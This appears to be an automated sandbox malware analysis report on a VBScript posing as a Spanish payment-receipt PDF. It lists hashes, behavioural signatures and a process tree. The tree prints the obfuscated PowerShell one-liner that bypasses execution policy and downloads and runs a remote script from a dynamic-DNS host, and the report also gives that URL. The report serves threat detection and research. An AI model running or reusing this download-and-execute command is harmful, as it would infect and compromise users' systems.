Analysis
-
max time kernel
44s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
01/11/2022, 08:41
Static task
static1
Behavioral task
behavioral1
Sample
JUSTIFICANTE DE PAGO,pdf.vbs
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
JUSTIFICANTE DE PAGO,pdf.vbs
Resource
win10v2004-20220812-en
General
-
Target
JUSTIFICANTE DE PAGO,pdf.vbs
-
Size
722B
-
MD5
04e47e5f5b9f59e48c54939992252fd9
-
SHA1
5b3d989972677faf61eb5aadb194fc441a93a1ab
-
SHA256
051bc8ae84b32374b0b3372aecb972f2b41a8626e302ea18e6178933ecfecb22
-
SHA512
08c7de2e1530551a3b32c4d88ce56f1d4031c7f05d8e5bfd0de1d5d8edaada46f9d1b8dc89beeb58a29710b579c4732dfb400fc6ccb36e838335188b60ab93f8
Malware Config
Extracted
http://khghfsaguvtyrioukjhgfydfgbhnyjhbgvdcertrtbgnhhbjctryvbgnhmihgyr.ydns.eu/qazxswedcvfrtgbnhyujm/waswaswaswa.ps1
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1288 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1288 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1288 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 996 wrote to memory of 1288 996 WScript.exe 27 PID 996 wrote to memory of 1288 996 WScript.exe 27 PID 996 wrote to memory of 1288 996 WScript.exe 27 PID 1288 wrote to memory of 1704 1288 powershell.exe 29 PID 1288 wrote to memory of 1704 1288 powershell.exe 29 PID 1288 wrote to memory of 1704 1288 powershell.exe 29 PID 1704 wrote to memory of 652 1704 csc.exe 30 PID 1704 wrote to memory of 652 1704 csc.exe 30 PID 1704 wrote to memory of 652 1704 csc.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTE DE PAGO,pdf.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec ByPaSs -C i`Ex(nE`w-OBj`ecT ('N'+'et.Webcl'+'ie'+'nt')).('Do'+'wn'+'loadStri'+'ng').Invoke('http://khghfsaguvtyrioukjhgfydfgbhnyjhbgvdcertrtbgnhhbjctryvbgnhmihgyr.ydns.eu/qazxswedcvfrtgbnhyujm/waswaswaswa.ps1')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kmzsoht9.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2AAB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2AAA.tmp"4⤵PID:652
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c0cd503c244ab4707ef1214dc57da575
SHA1761c480fa8e75041c728a52e3b6e4f8261446a36
SHA256b561d4b3ec7306633b3c50fb984043b5f15dd4a9fbfcc3fdfb00cb016f960222
SHA512a924c0a46d7fcc3bc3de8c72cdefa2b8fab5a05445feae2e953a03727fd7c05d550306b497d6ed57777cf52f4550d6561d99be718948c8fdf8d50aec0dc12709
-
Filesize
5KB
MD59cd187559f96a6b66c480bd47b498264
SHA150ee52495f8386cc867a4ffc0ebf893824812464
SHA25654d0806d45881da27560289d011df3491ad53d2ce438ecee29c0b65f6f475a39
SHA5121faa5dace83f7c45a884c16ae5513f6abde32a95cd49645a78878791bcf1006997a2d51e10f5bca74cabfd4440ebbab217894c3b0195d86c3445a71de30a2676
-
Filesize
11KB
MD55f422fc5116b358fe6a5b3f30f7e3150
SHA1cf1e91ebc729e1b45019cf2feed5b736b3ddd35a
SHA256bbe9aaa5f749dc340e4cf7390bb4f32b24aa3e1391564a8f85f4cde3976a6d03
SHA512afd0f427660d824668f9d5a127a6d3858e0f6ba617121a069f61aa546a1fd5672cb20708296cd91a1e2b2b97ac0e4f04797ac4b932ab856db0fab48bdc849b08
-
Filesize
652B
MD5cc7555159f94b6dd1b2bdb16166c809b
SHA16591cbc1092544900c7aecdf9ffeda1130aafc42
SHA2566d14fe90478f8dd8b7238ef69b8bffba2523733013d126f224509fca3e292de6
SHA512a356ad102bdc88ebfc08eb09a0f4847a443ec73f07c68e798ba6be4d0b01cac943d11c15dc5f38c8dae8c36881d11e7fe319117cd5b168e92429d36955eb04fa
-
Filesize
1KB
MD52d821e64622bd1c7e8d9cbd7906d7e93
SHA144ce279eee1ac333c09cee731432dbd79fd735a7
SHA25695690250100bb794cb88e93bcbf58994745ed7985f7370146ecf4b78514813ac
SHA51282d0741913eb7ac945008a613bb5e11047db3b20a3bfbc6d50b7ef6350965854d7f8576998012000f8661df149f67e38123269bc352bcc72488a5988afd17980
-
Filesize
309B
MD51c8c803c95890e4a52cf379796fd7586
SHA1092092b0ec77455a26f7cc3483aa1a7ad289f59e
SHA256273cd542f0da9975d30c5cea09396853bbc0480fb2add38329e32e445853ee4d
SHA5121cb45895811a99ceb4f897794aee8df480d28283814256e2f56000dc6a81fbfce48278e6617f1b87d91e3b2ca8147fe6636d24e8a568789d814c357bcccc3ed1